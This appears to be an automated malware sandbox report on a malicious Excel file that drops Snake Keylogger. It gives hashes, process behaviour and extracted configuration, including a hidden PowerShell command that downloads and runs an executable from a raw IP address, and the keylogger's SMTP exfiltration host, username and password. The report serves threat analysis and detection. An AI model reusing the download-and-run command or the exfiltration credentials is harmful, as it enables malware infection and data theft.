Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
24-06-2021 11:59
Static task
static1
Behavioral task
behavioral1
Sample
4c6e2dca5d80b3c2c6191266e3a07e5d668752d2.xls
Resource
win7v20210408
General
-
Target
4c6e2dca5d80b3c2c6191266e3a07e5d668752d2.xls
-
Size
118KB
-
MD5
4214df1ddc5e781bd44ae657284476b9
-
SHA1
4c6e2dca5d80b3c2c6191266e3a07e5d668752d2
-
SHA256
bd91083ce01f04c11111c5c33b76552125e1961efbbe15010b1de43349a08843
-
SHA512
00d945cf9d210c3b251351d6c6afd6ef9e50b873fe2f2e8da99cb41a79370a7ea7b02131ab4b081a332f732fb647484fd45cb988a0acd46195dac09db93c63a5
Malware Config
Extracted
http://212.192.241.94/news/IMG_1081007003xls.exe
Extracted
snakekeylogger
Protocol: smtp- Host:
nobettwo.xyz - Port:
587 - Username:
saturn1@nobettwo.xyz - Password:
O^1)7]oEv=*a
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1968 360 cmd.exe EXCEL.EXE -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
fieldwith.exepid process 2044 fieldwith.exe -
Loads dropped DLL 1 IoCs
Processes:
fieldwith.exepid process 1796 fieldwith.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 checkip.dyndns.org 12 freegeoip.app 13 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
fieldwith.exedescription pid process target process PID 1796 set thread context of 2044 1796 fieldwith.exe fieldwith.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 360 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exefieldwith.exefieldwith.exepid process 1712 powershell.exe 1712 powershell.exe 1796 fieldwith.exe 1796 fieldwith.exe 2044 fieldwith.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exefieldwith.exefieldwith.exedescription pid process Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1796 fieldwith.exe Token: SeDebugPrivilege 2044 fieldwith.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 360 EXCEL.EXE 360 EXCEL.EXE 360 EXCEL.EXE -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exefieldwith.exedescription pid process target process PID 360 wrote to memory of 1968 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 1968 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 1968 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 1968 360 EXCEL.EXE cmd.exe PID 1968 wrote to memory of 1712 1968 cmd.exe powershell.exe PID 1968 wrote to memory of 1712 1968 cmd.exe powershell.exe PID 1968 wrote to memory of 1712 1968 cmd.exe powershell.exe PID 1968 wrote to memory of 1712 1968 cmd.exe powershell.exe PID 1712 wrote to memory of 1796 1712 powershell.exe fieldwith.exe PID 1712 wrote to memory of 1796 1712 powershell.exe fieldwith.exe PID 1712 wrote to memory of 1796 1712 powershell.exe fieldwith.exe PID 1712 wrote to memory of 1796 1712 powershell.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe PID 1796 wrote to memory of 2044 1796 fieldwith.exe fieldwith.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4c6e2dca5d80b3c2c6191266e3a07e5d668752d2.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Documents\drivehold.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w h Start-BitsTransfer -Source http://212.192.241.94/news/IMG_1081007003xls.exe -Destination C:\Users\Public\Documents\fieldwith.exe;C:\Users\Public\Documents\fieldwith.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\fieldwith.exe"C:\Users\Public\Documents\fieldwith.exe"4⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\fieldwith.exeC:\Users\Admin\AppData\Local\Temp\fieldwith.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\fieldwith.exeMD5
103ef5b9b04a1bb72a1feb10997e0ef0
SHA18b9a31bdbbef91862dcbed5546372f2f0800a5df
SHA2567f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947
SHA512604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b
-
C:\Users\Admin\AppData\Local\Temp\fieldwith.exeMD5
103ef5b9b04a1bb72a1feb10997e0ef0
SHA18b9a31bdbbef91862dcbed5546372f2f0800a5df
SHA2567f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947
SHA512604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b
-
C:\Users\Public\Documents\drivehold.batMD5
2cb6cb6243eb0fc50985967f9885c1ac
SHA1480c54b6553861251d0db5aa7834dc129cfef077
SHA25652328ee7bd27a482be1a0f466912ed1b5a0bb2c6985c3a3d90969bf2d89cb20a
SHA5120a281f282a9afca0466c438132139637a6f2aa741b76c112c6bd0101355c885296cf3c7dce1c48e453e5db579a2172cffe4d724bf170b34666522e7640dd15dd
-
\Users\Admin\AppData\Local\Temp\fieldwith.exeMD5
103ef5b9b04a1bb72a1feb10997e0ef0
SHA18b9a31bdbbef91862dcbed5546372f2f0800a5df
SHA2567f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947
SHA512604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b
-
memory/360-59-0x000000002FEB1000-0x000000002FEB4000-memory.dmpFilesize
12KB
-
memory/360-60-0x0000000070E11000-0x0000000070E13000-memory.dmpFilesize
8KB
-
memory/360-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/360-109-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1712-67-0x0000000004700000-0x0000000004701000-memory.dmpFilesize
4KB
-
memory/1712-66-0x0000000000F30000-0x0000000000F31000-memory.dmpFilesize
4KB
-
memory/1712-69-0x0000000000FE2000-0x0000000000FE3000-memory.dmpFilesize
4KB
-
memory/1712-70-0x0000000002580000-0x0000000002581000-memory.dmpFilesize
4KB
-
memory/1712-71-0x0000000005300000-0x0000000005301000-memory.dmpFilesize
4KB
-
memory/1712-74-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/1712-79-0x00000000056C0000-0x00000000056C1000-memory.dmpFilesize
4KB
-
memory/1712-80-0x0000000006250000-0x0000000006251000-memory.dmpFilesize
4KB
-
memory/1712-87-0x00000000061B0000-0x00000000061B1000-memory.dmpFilesize
4KB
-
memory/1712-88-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1712-89-0x00000000055C0000-0x00000000055C1000-memory.dmpFilesize
4KB
-
memory/1712-64-0x0000000000000000-mapping.dmp
-
memory/1712-65-0x0000000075451000-0x0000000075453000-memory.dmpFilesize
8KB
-
memory/1712-68-0x0000000000FE0000-0x0000000000FE1000-memory.dmpFilesize
4KB
-
memory/1796-95-0x0000000000820000-0x000000000086E000-memory.dmpFilesize
312KB
-
memory/1796-100-0x0000000004DA0000-0x0000000004E09000-memory.dmpFilesize
420KB
-
memory/1796-94-0x0000000004D60000-0x0000000004D61000-memory.dmpFilesize
4KB
-
memory/1796-92-0x0000000000C10000-0x0000000000C11000-memory.dmpFilesize
4KB
-
memory/1796-91-0x0000000000000000-mapping.dmp
-
memory/1968-62-0x0000000000000000-mapping.dmp
-
memory/2044-102-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/2044-103-0x000000000042049E-mapping.dmp
-
memory/2044-106-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/2044-108-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB